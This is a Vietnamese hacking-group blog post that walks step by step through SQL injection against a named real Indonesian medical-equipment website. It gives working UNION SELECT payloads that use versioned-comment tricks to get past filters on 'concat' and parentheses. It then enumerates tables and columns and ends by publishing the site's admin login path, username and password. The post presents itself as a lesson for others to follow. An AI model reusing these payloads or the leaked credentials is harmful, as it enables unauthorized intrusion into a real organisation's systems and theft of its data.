Victim: http://www.alatkesehatan.co.id
Lưu ý: site này bị cắn query "concat" và chặn luôn dấu "( )" nhé.
Ta tìm version:
http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,2,3,4;&nm=doctor_equipment
ra được số "2" thay version vào
http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,@@version,3,4;&nm=doctor_equipment
=> 5.5.34-log
Get Table:
http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000table_name,3,4 from /*!10000information_schema*/.tables where table_schema=database() limit 0,1;&nm=doctor_equipment
Ta tăng "Limit" lên dần dần để tìm từ khóa khả nghi
=> Limit 0,1 = tbl_config
Theo thứ tự 1,1 rồi 2,1...
Get Column:
http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000column_name,3,4 from /*!10000information_schema*/.columns where table_name=0x74626c5f75736572 limit 0,1;&nm=doctor_equipment
Khai thác y chang như get table nhé. Cứ tăng dần Limit.
----------------------------
Link Admin: http://www.alatkesehatan.co.id/myadmin
User ID: admin
Password: A789000EE==
-------------------------------
Lưu ý đây là site mẫu tôi đã check qua rồi và đã hướng dẫn nhiều rồi nên các bạn chỉ xem đây là một bài học kinh nghiệm
Thứ Sáu, 26 tháng 9, 2014
Hướng dẫn check site chặn ký tự và query
--- Checked By Quý Huỳnh, Admin VN - Hacking Group ---
Đăng ký:
Đăng Nhận xét (Atom)
0 nhận xét:
Đăng nhận xét